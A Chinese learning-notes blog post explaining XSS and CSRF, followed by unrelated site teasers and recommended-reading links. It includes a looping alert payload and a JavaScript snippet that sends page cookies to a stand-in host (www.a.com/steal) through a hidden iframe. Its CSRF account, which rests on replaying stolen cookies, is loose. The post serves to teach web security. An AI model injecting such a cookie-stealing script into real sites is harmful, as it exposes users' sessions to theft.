XSS 和 CSRF

最近發(fā)現(xiàn)自己對(duì)網(wǎng)絡(luò)安全這一塊比較空白.

僅僅只是知道有一個(gè) XSS (Cross-site script).也知道大體是怎么回事,但是從來(lái)沒(méi)有寫過(guò)代碼測(cè)試和練習(xí).

今天有空,就專門研究一下 XSS 和 CSRF


XSS

XSS 是 Cross-site script 縮寫.

中文釋義: 跨站腳本攻擊.

基維百科:

XSS: 跨站腳本(Cross-site script)是一中網(wǎng)站應(yīng)用程序的安全漏洞,是代碼注入的一種.它允許惡意用戶將代碼注入到網(wǎng)站上,讓其它正在觀察網(wǎng)頁(yè)時(shí)的用戶受到影響.

理解起來(lái)也簡(jiǎn)單,無(wú)非就是在某個(gè)網(wǎng)站的某個(gè)請(qǐng)求里,提交一段 Javascript 代碼而已.

現(xiàn)在很多網(wǎng)站后天都作了過(guò)濾,比如 <,script 等危險(xiǎn)關(guān)鍵字.
基本會(huì)在出現(xiàn)這樣的情況了.

但是如果后臺(tái)沒(méi)有做這種危險(xiǎn)的字符過(guò)率,一段很簡(jiǎn)單的XSS跨站腳本代碼,<甚至都不用不跨站>,就可以支配所有訪問(wèn)這個(gè)頁(yè)面的用戶.

<script>while(true) { alert('被彈窗的恐懼支配吧??你關(guān)不掉der~') }</script>

XSS 既然翻譯成 跨站腳本攻擊..

上述那個(gè)代碼只是循環(huán)彈窗而已,并未涉及到跨站.

所以不能算是完整的XSS攻擊.頂多叫腳本攻擊

所以,必須有跨站的操作,才能稱為完整的XSS.

現(xiàn)在的網(wǎng)站中,或多或少的會(huì)把一些和用戶相關(guān)的數(shù)據(jù)通過(guò)cookie傳遞到前臺(tái).


// 通過(guò)XSS把這么一段代碼設(shè)置到網(wǎng)站頁(yè)面中.
(function(w,d){
    // 獲取當(dāng)前頁(yè)面的cookie.
    const cookie = d.cookie
    const fromURL = w.host 
    const stealURL = `http://www.a.com/steal?from=${fromURL}&cookie=${cookie}`
    
    const hiddenIframe = document.createElement('iframe')
    hiddenIframe.width = '0px'
    hiddenIframe.height = '0px'
    hiddenIframe.src = stealURL
    
    d.appendChild(hiddenIframe)
})(window,document)

通過(guò)這么一端腳本代碼,可以將當(dāng)前頁(yè)面的cookie等信息發(fā)送到我自己的后臺(tái).

那么在我自己的后臺(tái)就可以存儲(chǔ)用戶的一些比較私密的數(shù)據(jù)了.

這里有:

  • 腳本
  • 跨站

所以,可以稱之為一個(gè)完整的XSS(cross-site script) 跨站腳本攻擊.

但是目前基本所有的網(wǎng)站都做了危險(xiǎn)字符過(guò)濾或者替換.這種攻擊基本不會(huì)產(chǎn)生什么威脅了.


CSRF

CSRF 是 cross-site request forgery 的縮寫.

中文釋義: 跨站請(qǐng)求偽造.

基維百科:

跨站請(qǐng)求偽造(cross-site rquest forgery),也被稱之為 one-click attack 或者 session riding,通吃捍伲縮寫為 CSRF 或者 XSRF , 是一種挾制用戶在當(dāng)前已經(jīng)登錄的web頁(yè)面上執(zhí)行一些非本意的操作.

光看這單解釋,好像能理解的半成.

  • 用戶要登錄.
  • 利用用戶登陸的數(shù)據(jù)或者狀態(tài)做一些只有在當(dāng)前用戶登陸情況下的事情.比如刪帖.修改昵稱...

上一節(jié) XSS 攻擊,如果我們能拿到用戶的cookie等信息的話.

只要我們?cè)谧ト〈司W(wǎng)站的刪帖鏈接,修改昵稱鏈接.

查詢需要傳遞的給后臺(tái)的數(shù)據(jù),如果是包含這個(gè)cookie的話.

那我們就可以在我們后臺(tái)部署一套循環(huán)遍歷的請(qǐng)求了.

比如修改昵稱的鏈接和操作是: http://www.attacked.com/action/changeNickName?name=xxxxx

我們就可以在自己后臺(tái),請(qǐng)求里設(shè)置cookie.并請(qǐng)求這個(gè)鏈接,就可以修改用戶的昵稱了.

同理一些其他的操作.(比如刪帖等)


總結(jié):

  • XSS 是跨站腳本攻擊. (Cross-site script) ,只有腳本只能叫腳本攻擊,必須有跨站的行為才能稱之跨站腳本攻擊.
  • CSRF 跨站請(qǐng)求偽造(Cross-site request forgery),前提是拿到用戶的登陸信息.之后可以偽造當(dāng)前用戶做一些非用戶本意的操作.
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個(gè)濱河市举塔,隨后出現(xiàn)的幾起案子裆馒,更是在濱河造成了極大的恐慌,老刑警劉巖,帶你破解...
    沈念sama閱讀 211,042評(píng)論 6 490
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件沪伙,死亡現(xiàn)場(chǎng)離奇詭異,居然都是意外死亡县好,警方通過(guò)查閱死者的電腦和手機(jī)围橡,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 89,996評(píng)論 2 384
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)缕贡,“玉大人翁授,你說(shuō)我怎么就攤上這事拣播。” “怎么了收擦?”我有些...
    開封第一講書人閱讀 156,674評(píng)論 0 345
  • 文/不壞的土叔 我叫張陵贮配,是天一觀的道長(zhǎng)。 經(jīng)常有香客問(wèn)我塞赂,道長(zhǎng)泪勒,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 56,340評(píng)論 1 283
  • 正文 為了忘掉前任宴猾,我火速辦了婚禮圆存,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘仇哆。我一直安慰自己沦辙,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 65,404評(píng)論 5 384
  • 文/花漫 我一把揭開白布税产。 她就那樣靜靜地躺著怕轿,像睡著了一般。 火紅的嫁衣襯著肌膚如雪辟拷。 梳的紋絲不亂的頭發(fā)上撞羽,一...
    開封第一講書人閱讀 49,749評(píng)論 1 289
  • 那天,我揣著相機(jī)與錄音衫冻,去河邊找鬼诀紊。 笑死,一個(gè)胖子當(dāng)著我的面吹牛隅俘,可吹牛的內(nèi)容都是我干的邻奠。 我是一名探鬼主播,決...
    沈念sama閱讀 38,902評(píng)論 3 405
  • 文/蒼蘭香墨 我猛地睜開眼为居,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼碌宴!你這毒婦竟也來(lái)了?” 一聲冷哼從身側(cè)響起蒙畴,我...
    開封第一講書人閱讀 37,662評(píng)論 0 266
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤贰镣,失蹤者是張志新(化名)和其女友劉穎,沒(méi)想到半個(gè)月后膳凝,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體碑隆,經(jīng)...
    沈念sama閱讀 44,110評(píng)論 1 303
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 36,451評(píng)論 2 325
  • 正文 我和宋清朗相戀三年蹬音,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了上煤。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 38,577評(píng)論 1 340
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡著淆,死狀恐怖劫狠,靈堂內(nèi)的尸體忽然破棺而出拴疤,到底是詐尸還是另有隱情,我是刑警寧澤嘉熊,帶...
    沈念sama閱讀 34,258評(píng)論 4 328
  • 正文 年R本政府宣布遥赚,位于F島的核電站,受9級(jí)特大地震影響阐肤,放射性物質(zhì)發(fā)生泄漏凫佛。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 39,848評(píng)論 3 312
  • 文/蒙蒙 一孕惜、第九天 我趴在偏房一處隱蔽的房頂上張望愧薛。 院中可真熱鬧,春花似錦衫画、人聲如沸毫炉。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,726評(píng)論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)瞄勾。三九已至,卻和暖如春弥激,著一層夾襖步出監(jiān)牢的瞬間进陡,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 31,952評(píng)論 1 264
  • 我被黑心中介騙來(lái)泰國(guó)打工微服, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留趾疚,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 46,271評(píng)論 2 360
  • 正文 我出身青樓以蕴,卻偏偏與公主長(zhǎng)得像糙麦,于是被迫代替她去往敵國(guó)和親。 傳聞我的和親對(duì)象是個(gè)殘疾皇子丛肮,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 43,452評(píng)論 2 348

推薦閱讀更多精彩內(nèi)容

  • 作者:dwqshttps://github.com/dwqs/blog/issues/68 在 Web 安全領(lǐng)域中...
    grain先森閱讀 398評(píng)論 0 2
  • 在 Web 安全領(lǐng)域中赡磅,XSS 和 CSRF 是最常見(jiàn)的攻擊方式。本文將會(huì)簡(jiǎn)單介紹 XSS 和 CSRF 的攻防問(wèn)...
    Hoistthecolors閱讀 379評(píng)論 0 0
  • XSS XSS宝与,即 Cross Site Script焚廊,中譯是跨站腳本攻擊;其原本縮寫是CSS伴鳖,但為了和層疊樣式(...
    小小的白菜閱讀 305評(píng)論 0 1
  • 感覺(jué)自己在實(shí)踐的過(guò)程中节值,缺少點(diǎn)web安全意識(shí)徙硅。而XSS作為全端安全中最常見(jiàn)的問(wèn)題之一榜聂,我自己也想找點(diǎn)資料來(lái)學(xué)習(xí)學(xué)習(xí)...
    卓三陽(yáng)閱讀 21,552評(píng)論 1 10
  • XSS cross site script,跨站腳本攻擊(關(guān)鍵字:腳本)嗓蘑。為了與 css 沖突取名為 xss须肆!XS...
    Allan要做活神仙閱讀 5,118評(píng)論 0 4